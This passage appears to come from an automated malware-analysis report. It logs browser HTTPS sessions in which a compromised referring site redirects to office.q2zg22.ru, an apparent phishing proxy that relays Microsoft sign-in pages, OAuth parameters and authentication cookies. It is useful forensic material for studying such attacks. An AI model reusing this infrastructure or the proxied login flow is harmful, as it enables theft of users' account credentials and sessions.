                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-02-02 19:18:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          83192.168.2.1649822172.67.209.714435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:18:24 UTC2848OUTGET / HTTP/1.1
                                                                                                                          Host: office.q2zg22.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Referer: https://galeonconstruction.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; esctx-sAcwFNXs9p0=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Xz-zY4mFOFPtOKDCtkncDgiCqiq8JSPFEneyjDU4hFCxc9yKOXR0OSKd5FYQRJM3mXeQZYPo-cw18QcWUama1nI0_hypcV18IPjbFcAN8l-2_npQ8hQ5HCn_XXMqMr00sdRCGYoSBfgWdZ8ETjE1OiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; esctx-M3Evdg9W3gI=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-JqQWhBFF3iERp8Semywl5LKbWyjZoUSF17HR6LRJwEeJzRn7zd5hZTtbNOswRWLDQ8kQv3hJMqkVu2XeDuIthdsdh_qgD7pZ2CcAHHgScJuPoGyxYFiTiJuI8--bsFrVKPZQGoqN7dxUP9axzl0FDSAA; brcap=0; cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=; buid=0.AVoAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAA.AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-boMTZDEK31Q8YeqQNlfeZUoRfNsDRRPRvViO-GhTigwwBRK7ud8gg8Ns4yNqBH-tzw5bscmKyh59lNlT60JCz7Rwp4nwWHZ75wZ4ilsHRBogAA; esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-w9y33GwHLRg75rjQ3nRfMFBNBJkRrnhLX8AcE24nRe-39xD3h6Hmaa_3zGrAfFX7O4WZ6VUmijaUiKhxJi9TS0fB3rz4i-XZ71ipeFm4Nb3CfO5Ubjg8SZH5niiXfSczBjYmdPttlkJUE6hJp2JxRjXmN5a8aDkLuanuiU1y-KQgAA; esctx-FfwgWlnTCko=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-QQIYc2f6sjkAdFmj32fTdGjbHy6r5zpymHnrIl-qxGm2M5qe1vQy_uNxlAL8GMxQt9EBNI1EGcDNXOVrYqaOeg0WPIUqbnM2q1S6Q4WKMcWuDPb8NgfMp8EkVKDmr-M65eUsJ9kczDD1hrAZJYCZeCAA; fpc=Aq_odsI7GDJHm8suSWCV-X-8Ae7AAQAAAN82T90OAAAA; ESTSWCTXFLOWTOKEN=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-6_pnhGoDhBgou9FA7aOdCkLjUWWNQnZ5kCDMiWbLxdEGhoHWW1LuK-vIr9PbdkktA9xaLrfVOAXEyss_lHk-Yb3Ft_HREp3zElGWHQaJ4VRu3di2hrvSd8OoGa-oejpBA0oMNQbpFrjl5rPQS1QnaAT-siwFQn3Wdo64-6EW-O4sOSDLtEprmVUPuo5AW5sq_kp59o4vIyfEe5ehf6XYbAt_VHs51bFjL0gTRp8A4lJk9Wuz7zyo0Q8zoOwGeOj4k-RqAIIo3GKJWZlozbOolHwKKo08zGtX7FU-QyTx8nssBxHM6A3tUft4BJ18KKCDidsmKLYzIPNBz0llbaLmEqx-uFE2tK-qdMPUt7Go3bShLWmR2qvomuzhkFaYpEqcCYXbVo_4gbO4-SH0YIi9G6rQvMfG_jbR9WVjKEzrzaAy58yzN6fFPRTBBb354gGQdqHLjDFtrC6cCZ5XHQM56r7SZ5UF0tWeVMRUkteA7QtYwIoAUF9RUXf9jfAtV8vEFm4p4Z9eDu_eILSIiwMRmUbyMKzZ-aSVPgZrSf-xVGNY6cDRkk-jv-YhXbGoaAx0qSAfVSsW3c6yxlPXtE9t5wWIcjSR0pzXKiCJsLmHiws0FRnRPSUfQgTdcjueLdj6IAA
                                                                                                                          2024-02-02 19:18:24 UTC1090INHTTP/1.1 302 Found
                                                                                                                          Date: Fri, 02 Feb 2024 19:18:24 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                          Cache-Control: no-cache, no-store
                                                                                                                          Expires: -1
                                                                                                                          Location: https://react.q2zg22.ru/login
                                                                                                                          Nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                          P3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                          Pragma: no-cache
                                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                          Report-To: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://identity.nel.measure.office.net/api/report?catId=GW+estsfd+chi"}]}
                                                                                                                          Set-Cookie: fpc=Aq_odsI7GDJHm8suSWCV-X-8Ae7AAQAAAN82T90OAAAA; Path=/; Expires=Sun, 03 Mar 2024 19:18:24 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                          Set-Cookie: x-ms-gateway-slice=estsfd; Path=/; HttpOnly; Secure; SameSite=None
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Ms-Ests-Server: 2.1.17216.2 - SCUS ProdSlices
                                                                                                                          X-Ms-Request-Id: 5ed40ed4-16ce-4c5d-b205-4b49b70ecc00
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 84f4c7a169fc673c-ATL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-02-02 19:18:24 UTC279INData Raw: 31 63 65 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 72 65 61 63 74 2e 71 32 7a 67 32 32 2e 72 75 2f 6c 6f 67 69 6e 23 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 73 2f 61 66 63 33 35 66 65 66 62 39 31 36 65 66 34 65 61 61 66 32 66 65 38 35 39 38 33 37 65 37 34 34 61 39 63 32 35 61 36 37 62 36 31 32 34 38 66 36 65 65 39 33 63 36 61 30 32 63 61 37 66 65 30 34 2f 35 32 31 33 39 33 66 66
                                                                                                                          Data Ascii: 1ce<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://react.q2zg22.ru/login#">here</a>.</h2><script type="application/javascript" src="/s/afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04/521393ff
                                                                                                                          2024-02-02 19:18:24 UTC190INData Raw: 66 30 36 61 37 36 35 37 33 33 35 38 36 66 66 38 64 63 30 64 62 36 33 35 31 34 37 62 34 64 39 61 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 73 2f 61 66 63 33 35 66 65 66 62 39 31 36 65 66 34 65 61 61 66 32 66 65 38 35 39 38 33 37 65 37 34 34 61 39 63 32 35 61 36 37 62 36 31 32 34 38 66 36 65 65 39 33 63 36 61 30 32 63 61 37 66 65 30 34 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                          Data Ascii: f06a765733586ff8dc0db635147b4d9a.js"></script><script type="application/javascript" src="/s/afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04.js"></script></body></html>
                                                                                                                          2024-02-02 19:18:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          84192.168.2.1649823104.21.85.1894435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:18:24 UTC1405OUTGET /login HTTP/1.1
                                                                                                                          Host: react.q2zg22.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Referer: https://galeonconstruction.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; OH.DCAffinity=OH-ncu; OH.FLID=3541f66b-883d-474b-bada-1a5283ac2b01; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=; .AspNetCore.OpenIdConnect.Nonce.3jhMw8SJjRQQ85vjmH1_74VX9hJGNnEkAciwcD5tIBTyllLGszLuwUTbipr2TkOBxrMopwhLhtER6dDoFtL5a56Uri3z7Hg1ZLzrfrA5a-LoowCS6BHS_rNQNlZ6A64OM6HSXA9CzVOr3Q-XeYJmhQwySjHQMIVGXXMyGuRNsVu13kVmDxRzQ_RuO_WSOVL-9NbV02OK1-tYRMfj1tkERwUczs58TE3Mi5WuyjhlBxsMAD2eer0ZCPktm21ooadm=N; .AspNetCore.Correlation.mueLpLFnUtogf9G56f_hDsFC0GbvqHch3Aa_N7_HoU4=N
                                                                                                                          2024-02-02 19:18:25 UTC1192INHTTP/1.1 302 Found
                                                                                                                          Date: Fri, 02 Feb 2024 19:18:25 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                          Cache-Control: no-cache, no-store
                                                                                                                          Location: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424983050563650.Y2ExYzgxZjItYzQ0OC00NGZiLTlkZmEtMTgyODk2MjEzNTZlM2IyMDBhY2MtZjlmZC00NjY1LTg2MTQtMzBiOTZjZmQzZmZk&ui_locales=en-US&mkt=en-US&client-request-id=a2d3a705-3719-4180-a89a-d819ae49ee07&state=cVigJ0JKTf9_p9nwrLeIejpLLL12Uyh9OPJOdewXQlGmDl6PEuqBRU12YO_Rh7PQdKwvV6i1wFIUZ9-EhwYWtkG4yTfICV5C6jSNAUoADJ6_0zI8wNMdIdaSYa8hT-NSBLEbMy_G0BYDULKKBl4E9Ea810-L67NsvlH1vUDs5gM8GHezu9jGTZv5CnUNeALJbhR-E1LnrgBBLTmgIMnzcGRIYgbDyHMzjadqPT5yQgH1vbHDx95jzBZOmijLYriIMyXBuWk5BqZIt3QU0LE--A&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0
                                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                          Request-Context: appId=
                                                                                                                          Set-Cookie: OH.SID=; Path=/; Expires=Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                          2024-02-02 19:18:25 UTC1307INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 2e 41 73 70 4e 65 74 43 6f 72 65 2e 4f 70 65 6e 49 64 43 6f 6e 6e 65 63 74 2e 4e 6f 6e 63 65 2e 78 53 37 74 47 49 51 53 7a 5a 51 76 44 38 49 34 6c 61 41 74 56 73 4f 56 56 4d 46 64 77 66 66 52 70 5f 5a 6d 2d 77 6f 5a 41 64 77 4a 74 75 74 55 44 6a 33 6f 53 6e 78 73 53 53 34 48 41 75 6d 59 39 6e 68 36 69 7a 61 32 64 42 4e 56 41 4c 33 70 4f 43 6b 7a 32 72 4a 47 32 4b 44 41 45 33 59 67 69 71 61 79 4f 4e 45 6a 79 5f 43 43 5a 61 57 49 79 77 63 36 76 35 65 74 62 4b 77 45 75 78 78 37 6a 48 43 75 63 69 54 75 6c 72 6f 72 7a 55 51 4d 44 42 37 37 61 78 69 35 4c 72 70 4d 64 6c 75 77 39 64 53 79 51 52 53 78 73 6b 4c 53 64 65 58 4e 49 69 5a 59 35 5a 71 75 53 43 79 58 46 37 4e 49 6b 32 70 6c 4c 75 6a 44 76 5a 63 67 68 69 7a 37 43 6e 2d
                                                                                                                          Data Ascii: Set-Cookie: .AspNetCore.OpenIdConnect.Nonce.xS7tGIQSzZQvD8I4laAtVsOVVMFdwffRp_Zm-woZAdwJtutUDj3oSnxsSS4HAumY9nh6iza2dBNVAL3pOCkz2rJG2KDAE3YgiqayONEjy_CCZaWIywc6v5etbKwEuxx7jHCuciTulrorzUQMDB77axi5LrpMdluw9dSyQRSxskLSdeXNIiZY5ZquSCyXF7NIk2plLujDvZcghiz7Cn-
                                                                                                                          2024-02-02 19:18:25 UTC413INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 4f 78 79 52 57 55 38 6c 66 76 53 6e 4b 78 6f 64 4e 65 4d 6e 4c 55 6e 25 32 42 44 42 37 55 71 6e 65 25 32 46 67 79 5a 73 58 25 32 42 57 71 53 72 30 6f 35 66 38 77 35 55 44 41 32 76 39 30 32 59 35 54 75 79 67 72 35 79 4e 59 55 56 30 67 41 4b 69 38 70 4a 25 32 46 63 25 32 42 76 32 62 46 41 39 4b 4c 6e 7a 6a 73 66 38 62 65 48 45 69 66 47 31 64 6f 6a 78 68 7a 73 57 41 6c 62 25 32 42 46 34 67 6c 55 7a 44 68 56 65 71 52 49 55 75 4d 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a
                                                                                                                          Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OxyRWU8lfvSnKxodNeMnLUn%2BDB7Uqne%2FgyZsX%2BWqSr0o5f8w5UDA2v902Y5Tuygr5yNYUV0gAKi8pJ%2Fc%2Bv2bFA9KLnzjsf8beHEifG1dojxhzsWAlb%2BF4glUzDhVeqRIUuM%3D"}],"group":"cf-nel","max_age":
                                                                                                                          2024-02-02 19:18:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          85192.168.2.1649824172.67.209.714435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:18:25 UTC3641OUTGET /common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424983050563650.Y2ExYzgxZjItYzQ0OC00NGZiLTlkZmEtMTgyODk2MjEzNTZlM2IyMDBhY2MtZjlmZC00NjY1LTg2MTQtMzBiOTZjZmQzZmZk&ui_locales=en-US&mkt=en-US&client-request-id=a2d3a705-3719-4180-a89a-d819ae49ee07&state=cVigJ0JKTf9_p9nwrLeIejpLLL12Uyh9OPJOdewXQlGmDl6PEuqBRU12YO_Rh7PQdKwvV6i1wFIUZ9-EhwYWtkG4yTfICV5C6jSNAUoADJ6_0zI8wNMdIdaSYa8hT-NSBLEbMy_G0BYDULKKBl4E9Ea810-L67NsvlH1vUDs5gM8GHezu9jGTZv5CnUNeALJbhR-E1LnrgBBLTmgIMnzcGRIYgbDyHMzjadqPT5yQgH1vbHDx95jzBZOmijLYriIMyXBuWk5BqZIt3QU0LE--A&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0 HTTP/1.1
                                                                                                                          Host: office.q2zg22.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Referer: https://galeonconstruction.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; esctx-sAcwFNXs9p0=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-Xz-zY4mFOFPtOKDCtkncDgiCqiq8JSPFEneyjDU4hFCxc9yKOXR0OSKd5FYQRJM3mXeQZYPo-cw18QcWUama1nI0_hypcV18IPjbFcAN8l-2_npQ8hQ5HCn_XXMqMr00sdRCGYoSBfgWdZ8ETjE1OiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; esctx-M3Evdg9W3gI=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-JqQWhBFF3iERp8Semywl5LKbWyjZoUSF17HR6LRJwEeJzRn7zd5hZTtbNOswRWLDQ8kQv3hJMqkVu2XeDuIthdsdh_qgD7pZ2CcAHHgScJuPoGyxYFiTiJuI8--bsFrVKPZQGoqN7dxUP9axzl0FDSAA; brcap=0; cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=; buid=0.AVoAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAA.AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-boMTZDEK31Q8YeqQNlfeZUoRfNsDRRPRvViO-GhTigwwBRK7ud8gg8Ns4yNqBH-tzw5bscmKyh59lNlT60JCz7Rwp4nwWHZ75wZ4ilsHRBogAA; esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-w9y33GwHLRg75rjQ3nRfMFBNBJkRrnhLX8AcE24nRe-39xD3h6Hmaa_3zGrAfFX7O4WZ6VUmijaUiKhxJi9TS0fB3rz4i-XZ71ipeFm4Nb3CfO5Ubjg8SZH5niiXfSczBjYmdPttlkJUE6hJp2JxRjXmN5a8aDkLuanuiU1y-KQgAA; esctx-FfwgWlnTCko=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-QQIYc2f6sjkAdFmj32fTdGjbHy6r5zpymHnrIl-qxGm2M5qe1vQy_uNxlAL8GMxQt9EBNI1EGcDNXOVrYqaOeg0WPIUqbnM2q1S6Q4WKMcWuDPb8NgfMp8EkVKDmr-M65eUsJ9kczDD1hrAZJYCZeCAA; fpc=Aq_odsI7GDJHm8suSWCV-X-8Ae7AAQAAAN82T90OAAAA; ESTSWCTXFLOWTOKEN=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-6_pnhGoDhBgou9FA7aOdCkLjUWWNQnZ5kCDMiWbLxdEGhoHWW1LuK-vIr9PbdkktA9xaLrfVOAXEyss_lHk-Yb3Ft_HREp3zElGWHQaJ4VRu3di2hrvSd8OoGa-oejpBA0oMNQbpFrjl5rPQS1QnaAT-siwFQn3Wdo64-6EW-O4sOSDLtEprmVUPuo5AW5sq_kp59o4vIyfEe5ehf6XYbAt_VHs51bFjL0gTRp8A4lJk9Wuz7zyo0Q8zoOwGeOj4k-RqAIIo3GKJWZlozbOolHwKKo08zGtX7FU-QyTx8nssBxHM6A3tUft4BJ18KKCDidsmKLYzIPNBz0llbaLmEqx-uFE2tK-qdMPUt7Go3bShLWmR2qvomuzhkFaYpEqcCYXbVo_4gbO4-SH0YIi9G6rQvMfG_jbR9WVjKEzrzaAy58yzN6fFPRTBBb354gGQdqHLjDFtrC6cCZ5XHQM56r7SZ5UF0tWeVMRUkteA7QtYwIoAUF9RUXf9jfAtV8vEFm4p4Z9eDu_eILSIiwMRmUbyMKzZ-aSVPgZrSf-xVGNY6cDRkk-jv-YhXbGoaAx0qSAfVSsW3c6yxlPXtE9t5wWIcjSR0pzXKiCJsLmHiws0FRnRPSUfQgTdcjueLdj6IAA
                                                                                                                          2024-02-02 19:18:25 UTC1351INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 02 Feb 2024 19:18:25 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                          Cache-Control: no-cache, no-store
                                                                                                                          Expires: -1
                                                                                                                          Link: <https://aadcdn.msftauth.net>; rel=preconnect; crossorigin
                                                                                                                          Link: <https://aadcdn.msftauth.net>; rel=dns-prefetch
                                                                                                                          Link: <https://aadcdn.msauth.net>; rel=dns-prefetch
                                                                                                                          Nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                          P3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                          Pragma: no-cache
                                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                          Report-To: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://identity.nel.measure.office.net/api/report?catId=GW+estsfd+chi"}]}
                                                                                                                          Set-Cookie: buid=0.AVoAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAA.AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-hE7W-3HlJa9owQFnQJrRENYP0J9Z8A-K4WnZMGz7A5QqO0kXsumO3i8krFA5k1OOPVOxoHJmIILqI1PwJRpWBA8-0mMatTVn8txshoM21rkgAA; Path=/; Expires=Sun, 03 Mar 2024 19:18:25 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                          Set-Cookie: esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-6sTAqDqt7ElFdN1sJSaDq_ggXMYVMb3uFYjIUVq62UeBPW3IB1LLdQHLQLLWtDHFMCnGz_YASr9t1IZ44yG-lHE2RWEbLOxEiDD7CCS16c7IvvS0q5msftUfTo962NYUj6qggkeRtHO1iFZB-mBEoCFjaDe7d9mg2e5R4XwYOGIgAA; Path=/; Domain=office.q2zg22.ru; HttpOnly; Secure; SameSite=None
                                                                                                                          2024-02-02 19:18:25 UTC790INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 65 73 63 74 78 2d 79 51 30 71 42 6a 6a 53 65 6d 45 3d 41 51 41 42 41 41 45 41 41 41 41 6d 6f 46 66 47 74 59 78 76 52 72 4e 72 69 51 64 50 4b 49 5a 2d 69 77 6e 4f 56 41 7a 6b 2d 6d 49 74 50 59 72 31 65 51 2d 73 59 57 62 6d 68 79 71 42 42 64 6d 34 7a 36 68 37 6a 47 56 33 5a 54 58 75 6b 48 37 54 78 55 74 7a 57 4e 6a 74 4c 5f 74 37 33 55 7a 39 49 42 51 46 32 55 46 71 66 53 45 69 61 50 5a 46 59 39 69 4c 34 50 51 6a 64 79 45 30 38 74 72 6a 6f 49 71 48 39 4b 64 69 63 49 79 50 31 64 47 4a 78 55 49 4b 5f 73 72 47 31 6d 62 5f 38 6b 79 43 6a 6c 38 66 65 79 54 6c 5f 53 34 6a 4a 68 5f 45 4b 46 76 77 42 53 41 41 3b 20 50 61 74 68 3d 2f 3b 20 44 6f 6d 61 69 6e 3d 6f 66 66 69 63 65 2e 71 32 7a 67 32 32 2e 72 75 3b 20 48 74 74 70 4f 6e
                                                                                                                          Data Ascii: Set-Cookie: esctx-yQ0qBjjSemE=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-iwnOVAzk-mItPYr1eQ-sYWbmhyqBBdm4z6h7jGV3ZTXukH7TxUtzWNjtL_t73Uz9IBQF2UFqfSEiaPZFY9iL4PQjdyE08trjoIqH9KdicIyP1dGJxUIK_srG1mb_8kyCjl8feyTl_S4jJh_EKFvwBSAA; Path=/; Domain=office.q2zg22.ru; HttpOn
                                                                                                                          2024-02-02 19:18:25 UTC1369INData Raw: 34 30 30 30 0d 0a 0d 0a 0d 0a 3c 21 2d 2d 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 2d 2d 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 63 6c 61 73 73 3d 22 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 69 67 6e 20 69 6e 20 74 6f 20 79 6f 75 72 20 61 63 63 6f 75 6e 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e
                                                                                                                          Data Ascii: 4000... Copyright (C) Microsoft Corporation. All rights reserved. --><!DOCTYPE html><html dir="ltr" class="" lang="en"><head> <title>Sign in to your account</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
